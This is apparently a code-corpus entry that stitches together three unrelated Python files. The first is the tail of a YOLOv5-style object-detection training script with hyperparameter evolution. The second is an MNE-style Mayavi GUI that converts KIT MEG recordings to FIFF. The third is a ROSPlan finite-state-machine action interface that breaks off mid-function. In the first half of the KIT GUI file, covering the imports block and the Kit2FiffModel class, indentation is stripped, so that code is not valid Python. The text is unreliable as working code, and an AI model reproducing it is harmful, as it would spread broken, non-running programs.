        opt.img_size.extend([opt.img_size[-1]] * (2 - len(opt.img_size)))  # extend to 2 sizes (train, test)
        opt.name = 'evolve' if opt.evolve else opt.name
        opt.save_dir = increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok | opt.evolve)  # increment run
    # DDP mode
    opt.total_batch_size = opt.batch_size
    device = select_device(opt.device, batch_size=opt.batch_size)
    if opt.local_rank != -1:
        assert torch.cuda.device_count() > opt.local_rank
        torch.cuda.set_device(opt.local_rank)
        device = torch.device('cuda', opt.local_rank)
        dist.init_process_group(backend='nccl', init_method='env://')  # distributed backend
        assert opt.batch_size % opt.world_size == 0, '--batch-size must be multiple of CUDA device count'
        opt.batch_size = opt.total_batch_size // opt.world_size
    # Hyperparameters
    with open(opt.hyp) as f:
        hyp = yaml.load(f, Loader=yaml.FullLoader)  # load hyps
        if 'box' not in hyp:
            warn('Compatibility: %s missing "box" which was renamed from "giou" in %s' %
                 (opt.hyp, 'https://github.com/ultralytics/yolov5/pull/1120'))
            hyp['box'] = hyp.pop('giou')
    # Train
    logger.info(opt)
    if not opt.evolve:
        tb_writer = None  # init loggers
        if opt.global_rank in [-1, 0]:
            logger.info(f'Start Tensorboard with "tensorboard --logdir {opt.project}", view at http://localhost:6006/')
            tb_writer = SummaryWriter(opt.save_dir)  # Tensorboard
        train(hyp, opt, device, tb_writer, wandb)
    # Evolve hyperparameters (optional)
    else:
        # Hyperparameter evolution metadata (mutation scale 0-1, lower_limit, upper_limit)
        meta = {'lr0': (1, 1e-5, 1e-1),  # initial learning rate (SGD=1E-2, Adam=1E-3)
                'lrf': (1, 0.01, 1.0),  # final OneCycleLR learning rate (lr0 * lrf)
                'momentum': (0.3, 0.6, 0.98),  # SGD momentum/Adam beta1
                'weight_decay': (1, 0.0, 0.001),  # optimizer weight decay
                'warmup_epochs': (1, 0.0, 5.0),  # warmup epochs (fractions ok)
                'warmup_momentum': (1, 0.0, 0.95),  # warmup initial momentum
                'warmup_bias_lr': (1, 0.0, 0.2),  # warmup initial bias lr
                'box': (1, 0.02, 0.2),  # box loss gain
                'cls': (1, 0.2, 4.0),  # cls loss gain
                'cls_pw': (1, 0.5, 2.0),  # cls BCELoss positive_weight
                'obj': (1, 0.2, 4.0),  # obj loss gain (scale with pixels)
                'obj_pw': (1, 0.5, 2.0),  # obj BCELoss positive_weight
                'iou_t': (0, 0.1, 0.7),  # IoU training threshold
                'anchor_t': (1, 2.0, 8.0),  # anchor-multiple threshold
                'anchors': (2, 2.0, 10.0),  # anchors per output grid (0 to ignore)
                'fl_gamma': (0, 0.0, 2.0),  # focal loss gamma (efficientDet default gamma=1.5)
                'hsv_h': (1, 0.0, 0.1),  # image HSV-Hue augmentation (fraction)
                'hsv_s': (1, 0.0, 0.9),  # image HSV-Saturation augmentation (fraction)
                'hsv_v': (1, 0.0, 0.9),  # image HSV-Value augmentation (fraction)
                'degrees': (1, 0.0, 45.0),  # image rotation (+/- deg)
                'translate': (1, 0.0, 0.9),  # image translation (+/- fraction)
                'scale': (1, 0.0, 0.9),  # image scale (+/- gain)
                'shear': (1, 0.0, 10.0),  # image shear (+/- deg)
                'perspective': (0, 0.0, 0.001),  # image perspective (+/- fraction), range 0-0.001
                'flipud': (1, 0.0, 1.0),  # image flip up-down (probability)
                'fliplr': (0, 0.0, 1.0),  # image flip left-right (probability)
                'mosaic': (1, 0.0, 1.0),  # image mixup (probability)
                'mixup': (1, 0.0, 1.0)}  # image mixup (probability)
        assert opt.local_rank == -1, 'DDP mode not implemented for --evolve'
        opt.notest, opt.nosave = True, True  # only test/save final epoch
        # ei = [isinstance(x, (int, float)) for x in hyp.values()]  # evolvable indices
        yaml_file = Path(opt.save_dir) / 'hyp_evolved.yaml'  # save best result here
        if opt.bucket:
            os.system('gsutil cp gs://%s/evolve.txt .' % opt.bucket)  # download evolve.txt if exists
        for _ in range(300):  # generations to evolve
            if Path('evolve.txt').exists():  # if evolve.txt exists: select best hyps and mutate
                # Select parent(s)
                parent = 'single'  # parent selection method: 'single' or 'weighted'
                x = np.loadtxt('evolve.txt', ndmin=2)
                n = min(5, len(x))  # number of previous results to consider
                x = x[np.argsort(-fitness(x))][:n]  # top n mutations
                w = fitness(x) - fitness(x).min()  # weights
                if parent == 'single' or len(x) == 1:
                    # x = x[random.randint(0, n - 1)]  # random selection
                    x = x[random.choices(range(n), weights=w)[0]]  # weighted selection
                elif parent == 'weighted':
                    x = (x * w.reshape(n, 1)).sum(0) / w.sum()  # weighted combination
                # Mutate
                mp, s = 0.8, 0.2  # mutation probability, sigma
                npr = np.random
                npr.seed(int(time.time()))
                g = np.array([x[0] for x in meta.values()])  # gains 0-1
                ng = len(meta)
                v = np.ones(ng)
                while all(v == 1):  # mutate until a change occurs (prevent duplicates)
                    v = (g * (npr.random(ng) < mp) * npr.randn(ng) * npr.random() * s + 1).clip(0.3, 3.0)
                for i, k in enumerate(hyp.keys()):  # plt.hist(v.ravel(), 300)
                    hyp[k] = float(x[i + 7] * v[i])  # mutate
            # Constrain to limits
            for k, v in meta.items():
                hyp[k] = max(hyp[k], v[1])  # lower limit
                hyp[k] = min(hyp[k], v[2])  # upper limit
                hyp[k] = round(hyp[k], 5)  # significant digits
            # Train mutation
            results = train(hyp.copy(), opt, device, wandb=wandb)
            # Write mutation results
            print_mutation(hyp.copy(), results, yaml_file, opt.bucket)
        # Plot results
        plot_evolution(yaml_file)
        print(f'Hyperparameter evolution complete. Best results saved as: {yaml_file}\n'
              f'Command to train a new model with these hyperparameters: $ python train.py --hyp {yaml_file}')
|
_kit2fiff_gui.py
|
"""Mayavi/traits GUI for converting data from KIT systems"""
# Authors: Christian Brodbeck <christianbrodbeck@nyu.edu>
#
# License: BSD (3-clause)
import os
import numpy as np
from scipy.linalg import inv
from threading import Thread
from ..externals.six.moves import queue
from ..io.meas_info import _read_dig_points, _make_dig_points
from ..utils import logger
# allow import without traits
try:
from mayavi.core.ui.mayavi_scene import MayaviScene
from mayavi.tools.mlab_scene_model import MlabSceneModel
from pyface.api import confirm, error, FileDialog, OK, YES, information
from traits.api import (HasTraits, HasPrivateTraits, cached_property,
Instance, Property, Bool, Button, Enum, File,
Float, Int, List, Str, Array, DelegatesTo)
from traitsui.api import (View, Item, HGroup, VGroup, spring, TextEditor,
CheckListEditor, EnumEditor, Handler)
from traitsui.menu import NoButtons
from tvtk.pyface.scene_editor import SceneEditor
except Exception:
from ..utils import trait_wraith
HasTraits = HasPrivateTraits = Handler = object
cached_property = MayaviScene = MlabSceneModel = Bool = Button = Float = \
DelegatesTo = Enum = File = Instance = Int = List = Property = \
Str = Array = spring = View = Item = HGroup = VGroup = EnumEditor = \
NoButtons = CheckListEditor = SceneEditor = TextEditor = trait_wraith
from ..io.kit.kit import RawKIT, KIT
from ..transforms import (apply_trans, als_ras_trans, als_ras_trans_mm,
get_ras_to_neuromag_trans, Transform)
from ..coreg import _decimate_points, fit_matched_points
from ._marker_gui import CombineMarkersPanel, CombineMarkersModel
from ._help import read_tooltips
from ._viewer import (HeadViewController, headview_item, PointObject,
_testing_mode)
# Editor used to pick which of the 5 KIT marker points to use for coreg.
use_editor = CheckListEditor(cols=5, values=[(i, str(i)) for i in range(5)])
backend_is_wx = False  # is there a way to determine this?
if backend_is_wx:
    # wx backend allows labels for wildcards
    hsp_points_wildcard = ['Head Shape Points (*.txt)|*.txt']
    hsp_fid_wildcard = ['Head Shape Fiducials (*.txt)|*.txt']
    kit_con_wildcard = ['Continuous KIT Files (*.sqd;*.con)|*.sqd;*.con']
else:
    # other backends accept bare glob patterns only
    hsp_points_wildcard = ['*.txt']
    hsp_fid_wildcard = ['*.txt']
    kit_con_wildcard = ['*.sqd;*.con']
# GUI tooltips for the kit2fiff panel, loaded from the shared help files.
tooltips = read_tooltips('kit2fiff')
class Kit2FiffModel(HasPrivateTraits):
"""Data Model for Kit2Fiff conversion
- Markers are transformed into RAS coordinate system (as are the sensor
coordinates).
- Head shape digitizer data is transformed into neuromag-like space.
"""
# Input Traits
markers = Instance(CombineMarkersModel, ())
sqd_file = File(exists=True, filter=kit_con_wildcard)
hsp_file = File(exists=True, filter=hsp_points_wildcard, desc="Digitizer "
"head shape")
fid_file = File(exists=True, filter=hsp_fid_wildcard, desc="Digitizer "
"fiducials")
stim_coding = Enum(">", "<", "channel")
stim_chs = Str("")
stim_chs_array = Property(depends_on='stim_chs')
stim_chs_ok = Property(depends_on='stim_chs_array')
stim_chs_comment = Property(depends_on='stim_chs_array')
stim_slope = Enum("-", "+")
stim_threshold = Float(1.)
# Marker Points
use_mrk = List(list(range(5)), desc="Which marker points to use for the "
"device head coregistration.")
# Derived Traits
mrk = Property(depends_on='markers.mrk3.points')
# Polhemus Fiducials
elp_raw = Property(depends_on=['fid_file'])
hsp_raw = Property(depends_on=['hsp_file'])
polhemus_neuromag_trans = Property(depends_on=['elp_raw'])
# Polhemus data (in neuromag space)
elp = Property(depends_on=['elp_raw', 'polhemus_neuromag_trans'])
fid = Property(depends_on=['elp_raw', 'polhemus_neuromag_trans'])
hsp = Property(depends_on=['hsp_raw', 'polhemus_neuromag_trans'])
# trans
dev_head_trans = Property(depends_on=['elp', 'mrk', 'use_mrk'])
head_dev_trans = Property(depends_on=['dev_head_trans'])
# info
sqd_fname = Property(Str, depends_on='sqd_file')
hsp_fname = Property(Str, depends_on='hsp_file')
fid_fname = Property(Str, depends_on='fid_file')
can_save = Property(Bool, depends_on=['stim_chs_ok', 'sqd_file', 'fid',
'elp', 'hsp', 'dev_head_trans'])
@cached_property
def _get_can_save(self):
"Only allow saving when either all or no head shape elements are set."
if not self.stim_chs_ok or not self.sqd_file:
return False
has_all_hsp = (np.any(self.dev_head_trans) and np.any(self.hsp) and
np.any(self.elp) and np.any(self.fid))
if has_all_hsp:
return True
has_any_hsp = self.hsp_file or self.fid_file or np.any(self.mrk)
return not has_any_hsp
@cached_property
def _get_dev_head_trans(self):
if (self.mrk is None) or not np.any(self.fid):
return np.eye(4)
src_pts = self.mrk
dst_pts = self.elp
n_use = len(self.use_mrk)
if n_use < 3:
error(None, "Estimating the device head transform requires at "
"least 3 marker points. Please adjust the markers used.",
"Not Enough Marker Points")
return
elif n_use < 5:
src_pts = src_pts[self.use_mrk]
dst_pts = dst_pts[self.use_mrk]
trans = fit_matched_points(src_pts, dst_pts, out='trans')
return trans
@cached_property
def _get_elp(self):
if self.elp_raw is None:
return np.empty((0, 3))
pts = self.elp_raw[3:8]
pts = apply_trans(self.polhemus_neuromag_trans, pts)
return pts
@cached_property
def _get_elp_raw(self):
if not self.fid_file:
return
try:
pts = _read_dig_points(self.fid_file)
if len(pts) < 8:
raise ValueError("File contains %i points, need 8" % len(pts))
except Exception as err:
error(None, str(err), "Error Reading Fiducials")
self.reset_traits(['fid_file'])
raise
else:
return pts
@cached_property
def _get_fid(self):
if self.elp_raw is None:
return np.empty((0, 3))
pts = self.elp_raw[:3]
pts = apply_trans(self.polhemus_neuromag_trans, pts)
return pts
@cached_property
def _get_fid_fname(self):
if self.fid_file:
return os.path.basename(self.fid_file)
else:
return '-'
@cached_property
def _get_head_dev_trans(self):
return inv(self.dev_head_trans)
@cached_property
def _get_hsp(self):
if (self.hsp_raw is None) or not np.any(self.polhemus_neuromag_trans):
return np.empty((0, 3))
else:
pts = apply_trans(self.polhemus_neuromag_trans, self.hsp_raw)
return pts
@cached_property
def _get_hsp_fname(self):
if self.hsp_file:
return os.path.basename(self.hsp_file)
else:
return '-'
@cached_property
def _get_hsp_raw(self):
fname = self.hsp_file
if not fname:
return
try:
pts = _read_dig_points(fname)
n_pts = len(pts)
if n_pts > KIT.DIG_POINTS:
msg = ("The selected head shape contains {n_in} points, "
"which is more than the recommended maximum ({n_rec}). "
"The file will be automatically downsampled, which "
"might take a while. A better way to downsample is "
"using FastScan.")
msg = msg.format(n_in=n_pts, n_rec=KIT.DIG_POINTS)
information(None, msg, "Too Many Head Shape Points")
pts = _decimate_points(pts, 5)
except Exception as err:
error(None, str(err), "Error Reading Head Shape")
self.reset_traits(['hsp_file'])
raise
else:
return pts
@cached_property
def _get_mrk(self):
return apply_trans(als_ras_trans, self.markers.mrk3.points)
@cached_property
def _get_polhemus_neuromag_trans(self):
if self.elp_raw is None:
return
pts = apply_trans(als_ras_trans_mm, self.elp_raw[:3])
nasion, lpa, rpa = pts
trans = get_ras_to_neuromag_trans(nasion, lpa, rpa)
trans = np.dot(trans, als_ras_trans_mm)
return trans
@cached_property
def _get_sqd_fname(self):
if self.sqd_file:
return os.path.basename(self.sqd_file)
else:
return '-'
@cached_property
def _get_stim_chs_array(self):
if not self.stim_chs.strip():
return True
try:
out = eval("r_[%s]" % self.stim_chs, vars(np))
if out.dtype.kind != 'i':
raise TypeError("Need array of int")
except:
return None
else:
return out
@cached_property
def _get_stim_chs_comment(self):
if self.stim_chs_array is None:
return "Invalid!"
elif self.stim_chs_array is True:
return "Ok: Default channels"
else:
return "Ok: %i channels" % len(self.stim_chs_array)
@cached_property
def _get_stim_chs_ok(self):
return self.stim_chs_array is not None
def clear_all(self):
"""Clear all specified input parameters"""
self.markers.clear = True
self.reset_traits(['sqd_file', 'hsp_file', 'fid_file', 'use_mrk'])
def get_event_info(self):
"""
Return a string with the number of events found for each trigger value
"""
if len(self.events) == 0:
return "No events found."
count = ["Events found:"]
events = np.array(self.events)
for i in np.unique(events):
n = np.sum(events == i)
count.append('%3i: %i' % (i, n))
return os.linesep.join(count)
    def get_raw(self, preload=False):
        """Create a raw object based on the current model settings.

        Parameters
        ----------
        preload : bool
            Preload the data into memory (passed on to RawKIT).

        Returns
        -------
        raw : RawKIT
            Raw instance for the current SQD file; digitizer points and the
            device-to-head transform are attached when fiducials are set.

        Raises
        ------
        ValueError
            If not all required parameters are set (``can_save`` is False).
        NotImplementedError
            For 'channel' coding with default stim channels.
        RuntimeError
            For an unrecognized ``stim_coding`` value.
        """
        if not self.can_save:
            raise ValueError("Not all necessary parameters are set")
        # stim channels and coding
        if self.stim_chs_array is True:
            if self.stim_coding == 'channel':
                stim_code = 'channel'
                raise NotImplementedError("Finding default event channels")
            else:
                # Default channels: pass the coding symbol ('<' or '>')
                # straight through as RawKIT's stim argument.
                stim = self.stim_chs_array
                stim_code = 'binary'
        else:
            stim = self.stim_chs_array
            if self.stim_coding == 'channel':
                stim_code = 'channel'
            elif self.stim_coding == '<':
                stim_code = 'binary'
            elif self.stim_coding == '>':
                # '>' coding: reverse the explicit channel order before
                # binary coding — presumably flips bit significance; TODO
                # confirm against RawKIT's stim handling.
                stim = stim[::-1]
                stim_code = 'binary'
            else:
                raise RuntimeError("stim_coding=%r" % self.stim_coding)
        logger.info("Creating raw with stim=%r, slope=%r, stim_code=%r, "
                    "stimthresh=%r", stim, self.stim_slope, stim_code,
                    self.stim_threshold)
        raw = RawKIT(self.sqd_file, preload=preload, stim=stim,
                     slope=self.stim_slope, stim_code=stim_code,
                     stimthresh=self.stim_threshold)
        if np.any(self.fid):
            raw.info['dig'] = _make_dig_points(self.fid[0], self.fid[1],
                                               self.fid[2], self.elp,
                                               self.hsp)
            raw.info['dev_head_t'] = Transform('meg', 'head',
                                               self.dev_head_trans)
        return raw
class Kit2FiffFrameHandler(Handler):
    """Check for unfinished save jobs before allowing the window to close."""
    def close(self, info, is_ok):
        save_queue = info.object.kit2fiff_panel.queue
        if not save_queue.unfinished_tasks:
            return True
        # Saving is still running in the worker thread: refuse to close and
        # tell the user why.
        information(None,
                    ("Can not close the window while saving is still in "
                     "progress. Please wait until all files are processed."),
                    "Saving Still in Progress")
        return False
class Kit2FiffPanel(HasPrivateTraits):
    """Control panel for kit2fiff conversion.

    Exposes the model traits to the view, renders the digitizer points in
    the shared Mayavi scene, and saves FIFF files on a background worker
    thread fed through ``queue``.
    """
    model = Instance(Kit2FiffModel)
    # model copies for view
    use_mrk = DelegatesTo('model')
    sqd_file = DelegatesTo('model')
    hsp_file = DelegatesTo('model')
    fid_file = DelegatesTo('model')
    stim_coding = DelegatesTo('model')
    stim_chs = DelegatesTo('model')
    stim_chs_ok = DelegatesTo('model')
    stim_chs_comment = DelegatesTo('model')
    stim_slope = DelegatesTo('model')
    stim_threshold = DelegatesTo('model')
    # info
    can_save = DelegatesTo('model')
    sqd_fname = DelegatesTo('model')
    hsp_fname = DelegatesTo('model')
    fid_fname = DelegatesTo('model')
    # Source Files
    reset_dig = Button
    # Visualization
    scene = Instance(MlabSceneModel)
    fid_obj = Instance(PointObject)
    elp_obj = Instance(PointObject)
    hsp_obj = Instance(PointObject)
    # Output
    save_as = Button(label='Save FIFF...')
    clear_all = Button(label='Clear All')
    # The RHS `queue.Queue` still resolves to the stdlib module because the
    # class-body name `queue` is only bound after this line evaluates.
    queue = Instance(queue.Queue, ())
    queue_feedback = Str('')
    queue_current = Str('')
    queue_len = Int(0)
    queue_len_str = Property(Str, depends_on=['queue_len'])
    error = Str('')
    view = View(
        VGroup(VGroup(Item('sqd_file', label="Data",
                           tooltip=tooltips['sqd_file']),
                      Item('sqd_fname', show_label=False, style='readonly'),
                      Item('hsp_file', label='Dig Head Shape'),
                      Item('hsp_fname', show_label=False, style='readonly'),
                      Item('fid_file', label='Dig Points'),
                      Item('fid_fname', show_label=False, style='readonly'),
                      Item('reset_dig', label='Clear Digitizer Files',
                           show_label=False),
                      Item('use_mrk', editor=use_editor, style='custom'),
                      label="Sources", show_border=True),
               VGroup(Item('stim_slope', label="Event Onset", style='custom',
                           tooltip=tooltips['stim_slope'],
                           editor=EnumEditor(
                               values={'+': '2:Peak (0 to 5 V)',
                                       '-': '1:Trough (5 to 0 V)'},
                               cols=2)),
                      Item('stim_coding', label="Value Coding", style='custom',
                           editor=EnumEditor(values={'>': '1:little-endian',
                                                     '<': '2:big-endian',
                                                     'channel': '3:Channel#'},
                                             cols=3),
                           tooltip=tooltips["stim_coding"]),
                      Item('stim_chs', label='Channels', style='custom',
                           tooltip=tooltips["stim_chs"],
                           editor=TextEditor(evaluate_name='stim_chs_ok',
                                             auto_set=True)),
                      Item('stim_chs_comment', label='>', style='readonly'),
                      Item('stim_threshold', label='Threshold',
                           tooltip=tooltips['stim_threshold']),
                      label='Events', show_border=True),
               HGroup(Item('save_as', enabled_when='can_save'), spring,
                      'clear_all', show_labels=False),
               Item('queue_feedback', show_label=False, style='readonly'),
               Item('queue_current', show_label=False, style='readonly'),
               Item('queue_len_str', show_label=False, style='readonly')
               )
    )

    def __init__(self, *args, **kwargs):
        super(Kit2FiffPanel, self).__init__(*args, **kwargs)

        # Setup save worker: a daemon thread that consumes (raw, fname)
        # jobs from self.queue so the GUI stays responsive while saving.
        def worker():
            while True:
                raw, fname = self.queue.get()
                basename = os.path.basename(fname)
                self.queue_len -= 1
                self.queue_current = 'Processing: %s' % basename
                # task
                try:
                    raw.save(fname, overwrite=True)
                except Exception as err:
                    self.error = str(err)
                    res = "Error saving: %s"
                else:
                    res = "Saved: %s"
                # finalize: clear the "current" label and report the result
                self.queue_current = ''
                self.queue_feedback = res % basename
                self.queue.task_done()

        t = Thread(target=worker)
        t.daemon = True
        t.start()

        # Setup mayavi visualization: one PointObject per point category.
        m = self.model
        self.fid_obj = PointObject(scene=self.scene, color=(25, 225, 25),
                                   point_scale=5e-3)
        self.elp_obj = PointObject(scene=self.scene, color=(50, 50, 220),
                                   point_scale=1e-2, opacity=.2)
        self.hsp_obj = PointObject(scene=self.scene, color=(200, 200, 200),
                                   point_scale=2e-3)
        if not _testing_mode():
            # One-way sync so model point/transform changes propagate to the
            # plotted objects.
            for name, obj in zip(['fid', 'elp', 'hsp'],
                                 [self.fid_obj, self.elp_obj, self.hsp_obj]):
                m.sync_trait(name, obj, 'points', mutual=False)
                m.sync_trait('head_dev_trans', obj, 'trans', mutual=False)
            self.scene.camera.parallel_scale = 0.15
            self.scene.mlab.view(0, 0, .15)

    def _clear_all_fired(self):
        self.model.clear_all()

    @cached_property
    def _get_queue_len_str(self):
        if self.queue_len:
            return "Queue length: %i" % self.queue_len
        else:
            return ''

    def _reset_dig_fired(self):
        self.reset_traits(['hsp_file', 'fid_file'])

    def _save_as_fired(self):
        # create raw
        try:
            raw = self.model.get_raw()
        except Exception as err:
            error(None, str(err), "Error Creating KIT Raw")
            raise
        # find default path: derive "<stem>-raw.fif" from the SQD file name
        stem, _ = os.path.splitext(self.sqd_file)
        if not stem.endswith('raw'):
            stem += '-raw'
        default_path = stem + '.fif'
        # save as dialog
        dlg = FileDialog(action="save as",
                         wildcard="fiff raw file (*.fif)|*.fif",
                         default_path=default_path)
        dlg.open()
        if dlg.return_code != OK:
            return
        fname = dlg.path
        if not fname.endswith('.fif'):
            fname += '.fif'
        if os.path.exists(fname):
            # BUG FIX: the filename was never interpolated into the message
            # (the dialog literally showed "%r"); format it with fname.
            msg = ("The file %r already exists. Should it "
                   "be replaced?" % fname)
            answer = confirm(None, msg, "Overwrite File?")
            if answer != YES:
                return
        # Hand the save job to the worker thread.
        self.queue.put((raw, fname))
        self.queue_len += 1
class Kit2FiffFrame(HasTraits):
    """Main KIT-to-FIFF conversion window.

    Combines the marker panel, the shared 3D scene with head-view controls,
    and the Kit2Fiff control panel.  (The previous docstring described
    marker interpolation, which is handled by the embedded marker panel.)
    """
    model = Instance(Kit2FiffModel, ())
    scene = Instance(MlabSceneModel, ())
    headview = Instance(HeadViewController)
    marker_panel = Instance(CombineMarkersPanel)
    kit2fiff_panel = Instance(Kit2FiffPanel)
    view = View(HGroup(VGroup(Item('marker_panel', style='custom'),
                              show_labels=False),
                       VGroup(Item('scene',
                                   editor=SceneEditor(scene_class=MayaviScene),
                                   dock='vertical', show_label=False),
                              VGroup(headview_item, show_labels=False),
                              ),
                       VGroup(Item('kit2fiff_panel', style='custom'),
                              show_labels=False),
                       show_labels=False,
                       ),
                handler=Kit2FiffFrameHandler(),
                height=700, resizable=True, buttons=NoButtons)

    def _headview_default(self):
        # Share the frame's scene so the head-view buttons control it.
        return HeadViewController(scene=self.scene, scale=160, system='RAS')

    def _kit2fiff_panel_default(self):
        return Kit2FiffPanel(scene=self.scene, model=self.model)

    def _marker_panel_default(self):
        return CombineMarkersPanel(scene=self.scene, model=self.model.markers,
                                   trans=als_ras_trans)
|
FSMActionInterface.py
|
#!/usr/bin/env python
import rospy, copy
import actionlib
from BaseActionInterface import BaseActionInterface
from ActionlibActionInterface import ActionlibActionInterface
from ServiceActionInterface import ServiceActionInterface
import threading
from rosplan_dispatch_msgs.msg import ActionFeedback
# ToDo: Implement mechanism to check cyclic execution
class Transition(object):
    """A single FSM transition: a target state plus its PDDL effects.

    Effect parsing is not implemented yet (ToDo: parse pddl expression for
    effects), so ``get_effects()`` still returns ''.  The raw expression is
    now retained instead of being silently discarded, so it is available
    once parsing is implemented.
    """

    def __init__(self, state_name, effects):
        self._to_state = state_name
        # Keep the raw (unparsed) effects expression; previously the
        # `effects` argument was thrown away entirely.
        self._raw_effects = effects
        self._effects = ''  # ToDo: parse pddl expression for effects

    def get_to_state(self):
        """Return the name of the state this transition leads to."""
        return self._to_state

    def get_effects(self):
        """Return the parsed effects (currently always '')."""
        return self._effects
class State(object):
    """One FSM state: a name, an action interface, and outgoing transitions.

    ``transitions`` maps an outcome name ("succeeded"/"failed") to a list of
    Transition objects, indexed by a retry counter.
    """

    def __init__(self, state_name, action_interface, transitions):
        self._name = state_name
        self._interface = action_interface
        self._outgoing = transitions

    def get_state_name(self):
        """Return this state's name."""
        return self._name

    def get_action_interface(self):
        """Return the action interface executed while in this state."""
        return self._interface

    def get_transition(self, transition_name, counter):
        """Return the counter-th transition for the given outcome name."""
        rospy.loginfo("transition_name = {}; counter = {}".format(transition_name, counter))
        return self._outgoing[transition_name][counter]
class FSMActionInterface(BaseActionInterface):
    """Action interface that executes a finite state machine of child
    action interfaces (actionlib, service, or nested fsm states).

    Execution starts in state "ba1" and follows the "succeeded"/"failed"
    outcomes reported by the children (via pass_child_action_finished_cb)
    until a terminal state ("goal_state", "start_state", "error_state") is
    reached.  All dynamic bookkeeping is keyed by (plan_id, action_id).
    """

    def __init__(self, action_config, parent_ai, action_feedback_pub):
        BaseActionInterface.__init__(self, action_config, parent_ai, action_feedback_pub)
        # 'Static' data: state name -> State (interface + transitions)
        self._states = {}
        # 'Dynamic' data, keyed [plan_id][action_id]
        self._running_state = {}
        self._transition_value = {}
        self._to_start_state = {}
        self._transitions_counters = {}
        # ToDo: Where and how to clear the dynamic data after the actions were executed
        for state_config in action_config["states"]:
            interface_type = state_config["interface_type"]
            if interface_type == "actionlib":
                ai = ActionlibActionInterface(state_config, self, self._action_feedback_pub)
            elif interface_type == "service":
                ai = ServiceActionInterface(state_config, self, self._action_feedback_pub)
            elif interface_type == "fsm":
                ai = FSMActionInterface(state_config, self, self._action_feedback_pub)
            else:
                # Previously an unknown type left `ai` undefined and crashed
                # later with a NameError; fail fast with a clear message.
                raise ValueError("Unknown interface_type %r for state %r"
                                 % (interface_type, state_config["name"]))
            transitions = self.parse_transitions(state_config)
            self._states[state_config["name"]] = State(state_config["name"], ai, transitions)

    def pass_child_action_finished_cb(self, transition_value, dispatch_msg):
        """Callback used by child interfaces to report their outcome."""
        self._transition_value[dispatch_msg.plan_id][dispatch_msg.action_id] = transition_value

    def run(self, dispatch_msg):
        """Start executing the FSM for dispatch_msg on a new thread."""
        new_thread = threading.Thread(target=self.run_thread, args=(dispatch_msg,))
        new_thread.start()

    def _ensure_bookkeeping(self, dispatch_msg):
        """Create the per-plan / per-action dynamic data entries if missing."""
        if dispatch_msg.plan_id not in self._running_state:
            self._running_state[dispatch_msg.plan_id] = {}
            self._transition_value[dispatch_msg.plan_id] = {}
            self._to_start_state[dispatch_msg.plan_id] = {}
            self._transitions_counters[dispatch_msg.plan_id] = {}
        if dispatch_msg.action_id not in self._running_state[dispatch_msg.plan_id]:
            self._running_state[dispatch_msg.plan_id][dispatch_msg.action_id] = None
            self._transition_value[dispatch_msg.plan_id][dispatch_msg.action_id] = None
            self._to_start_state[dispatch_msg.plan_id][dispatch_msg.action_id] = False
            self._transitions_counters[dispatch_msg.plan_id][dispatch_msg.action_id] = {
                "succeeded": 0, "failed": 0}

    def _next_transition(self, dispatch_msg, transition_value):
        """Return the transition for the reported outcome and update counters.

        Consecutive equal outcomes advance that outcome's counter (selecting
        the next transition in its list); the opposite counter is reset.
        Returns None for an unrecognized outcome value.
        """
        if transition_value not in ("succeeded", "failed"):
            return None
        other = "failed" if transition_value == "succeeded" else "succeeded"
        counters = self._transitions_counters[dispatch_msg.plan_id][dispatch_msg.action_id]
        state = self._running_state[dispatch_msg.plan_id][dispatch_msg.action_id]
        transition = state.get_transition(transition_value, counters[transition_value])
        counters[transition_value] += 1
        counters[other] = 0
        return transition

    def _publish_feedback(self, dispatch_msg, status):
        """Publish an ActionFeedback message with the given status."""
        fb = ActionFeedback()
        fb.action_id = dispatch_msg.action_id
        fb.plan_id = dispatch_msg.plan_id
        fb.status = status
        self._action_feedback_pub.publish(fb)

    def run_thread(self, dispatch_msg):
        """Execute the state machine for dispatch_msg until completion."""
        rospy.loginfo('KCL: ({}) Plan {} Action {}: State machine {} running on thread {}'.format(rospy.get_name(),
                                                                                                  dispatch_msg.plan_id,
                                                                                                  dispatch_msg.action_id,
                                                                                                  self.get_action_name(),
                                                                                                  threading.currentThread()))
        # Extend the dictionaries if needed
        self._ensure_bookkeeping(dispatch_msg)
        # Start running the first basic action
        self._running_state[dispatch_msg.plan_id][dispatch_msg.action_id] = self._states["ba1"]
        action_interface = self._running_state[dispatch_msg.plan_id][dispatch_msg.action_id].get_action_interface()
        action_interface.run(dispatch_msg)
        # Execute the fsm
        fsm_execution_completed = False
        while not fsm_execution_completed:
            transition_value = self._transition_value[dispatch_msg.plan_id][dispatch_msg.action_id]
            if transition_value is None:
                # No outcome reported yet: yield the CPU instead of
                # busy-spinning at 100% while the child action runs.
                rospy.sleep(0.01)
                continue
            # Reset the transition value
            self._transition_value[dispatch_msg.plan_id][dispatch_msg.action_id] = None
            # Based on the passed transition value get the transition and modify the counters accordingly
            transition = self._next_transition(dispatch_msg, transition_value)
            if transition is None:
                # Previously an unexpected value left `transition` as None
                # and crashed on get_to_state(); warn and keep waiting.
                rospy.logwarn('KCL: ({}) Plan {} Action {}: Unknown transition value {}'.format(
                    rospy.get_name(), dispatch_msg.plan_id, dispatch_msg.action_id, transition_value))
                continue
            to_state = transition.get_to_state()
            if to_state.find("ba") != -1:
                # If this fsm is on the highest level and it is transited for the first time to a reverse state
                if to_state.find("reverse") != -1 and \
                        not self._to_start_state[dispatch_msg.plan_id][dispatch_msg.action_id] and \
                        self._parent_ai is None:
                    # Mark the execution to start state
                    self._to_start_state[dispatch_msg.plan_id][dispatch_msg.action_id] = True
                    # Publish feedback
                    self._publish_feedback(dispatch_msg, ActionFeedback.ACTION_DISPATCHED_TO_START_STATE)
                rospy.loginfo('KCL: ({}) Plan {} Action {}: Transition to state {}'.format(rospy.get_name(),
                                                                                           dispatch_msg.plan_id,
                                                                                           dispatch_msg.action_id,
                                                                                           to_state))
                # Update the running state and get the names of the old and new states
                old_running_state_name = self._running_state[dispatch_msg.plan_id][
                    dispatch_msg.action_id].get_state_name()
                self._running_state[dispatch_msg.plan_id][dispatch_msg.action_id] = self._states[to_state]
                new_running_state_name = self._running_state[dispatch_msg.plan_id][
                    dispatch_msg.action_id].get_state_name()
                # Reset the transition counters for the next state only if transited to another state
                if old_running_state_name != new_running_state_name:
                    counters = self._transitions_counters[dispatch_msg.plan_id][dispatch_msg.action_id]
                    counters["succeeded"] = 0
                    counters["failed"] = 0
                # Run the action interface of the new state
                action_interface = self._running_state[dispatch_msg.plan_id][
                    dispatch_msg.action_id].get_action_interface()
                action_interface.run(dispatch_msg)
            # If this function was called from the goal state of the fsm
